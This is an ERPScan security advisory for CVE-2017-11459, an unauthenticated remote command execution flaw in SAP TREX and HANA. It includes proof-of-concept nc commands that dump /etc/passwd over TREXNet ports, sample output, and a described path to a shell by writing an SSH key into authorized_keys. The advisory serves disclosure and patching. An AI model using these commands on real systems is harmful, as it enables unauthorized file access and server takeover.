[ERPSCAN-17-019] SAP TREX RCE
Application: SAP TREX
Versions Affected: SAP TREX 7.10
Vendor URL: SAP
Bugs: RCE
Reported: 23.01.2017
Vendor response: 24.01.2017
Date of Public Advisory: 11.04.2017
Reference: SAP Security Note 2419592
Author: Mathieu Geli (ERPScan)
VULNERABILITY INFORMATION
Class: Missing Authentication for Critical Function
Impact: disclose OS files and potentially get RCE on the server (example for Linux)
Remotely Exploitable: yes
Locally Exploitable: no
CVE Name: CVE-2017-11459
CVSS Information
CVSS v3 Base Score: 9.4 / 10
CVSS v3 Base Vector:
AV: Attack Vector (Related exploit range) | Network (N) |
AC: Attack Complexity (Required attack complexity) | Low (L) |
PR: Privileges Required (Level of privileges needed to exploit) | None (N) |
UI: User Interaction (Required user participation) | None (N) |
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Unchanged (U) |
C: Impact to Confidentiality | High (H) |
I: Impact to Integrity | High (H) |
A: Impact to Availability | Low (L) |
Description
Some sensitive operations are available anonymously that can be combined to potentially get remote command execution on the server.
Business risk
A Remote Command Execution vulnerability allows an attacker to inject the code that can be executed by the application. The executed commands will run with the same privileges as the service that executed the command.
VULNERABLE PACKAGES
SAP TREX 7.10.72 (other versions not tested)
SAP HANA SPS12 (1.00.122.01.1470046197I)
SAP HANA 2.0 express edition (2.00.000.00.1479874437I)
SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2419592
TECHNICAL DESCRIPTION
An attacker can forge special request to the TREXNet ports 3NN01, 3NN02, 3NN03, 3NN04, 3NN06, 3NN07, 3NN08 to read OS files (command 'fget'
) or create files (command 'fdir'
).
If the system is Linux (by default SSH is activated), we can showcase how to get a shell on the server with those two operations by uploading a public key in the service’s file ~/.ssh/authorized_keys
and then connect via SSH to the server, taking full control of the TREX daemon.
Proof of Concept
The first attached file "trex_fget_passwd.bin"
is a request to dump OS file /etc/passwd
on a Unix TREX 7.10 patched server.
You can run the exploit like this:
1 |
$ cat trex_fget_passwd.bin | nc <TREXSERVER> 30001 |
NB: The port can be any of the TREX ports (from 30001 to 30009).
The response should be the content of the @/etc/passwd@
file like:
1 2 3 4 5 6 7 |
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash bin:x:1:1:bin:/bin:/bin/bash daemon:x:2:2:Daemon:/sbin:/bin/bash ftp:x:40:49:FTP account:/srv/ftp:/bin/bash games:x:12:100:Games account:/var/games:/bin/bash gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false [...] |
The second file is for HANA SPS12, dumping @/etc/passwd@
1 |
$ cat hanaSPS12_fget_passwd.bin | nc <HANASERVER> 30001 |
NB: The port can be any of the TREX ports (from 30001 to 30009)
The response should be the content of the @/etc/passwd@
file looking like:
1 2 3 4 5 6 7 |
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash bin:x:1:1:bin:/bin:/bin/bash daemon:x:2:2:Daemon:/sbin:/bin/bash ftp:x:40:49:FTP account:/srv/ftp:/bin/bash games:x:12:100:Games account:/var/games:/bin/bash gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false [...] |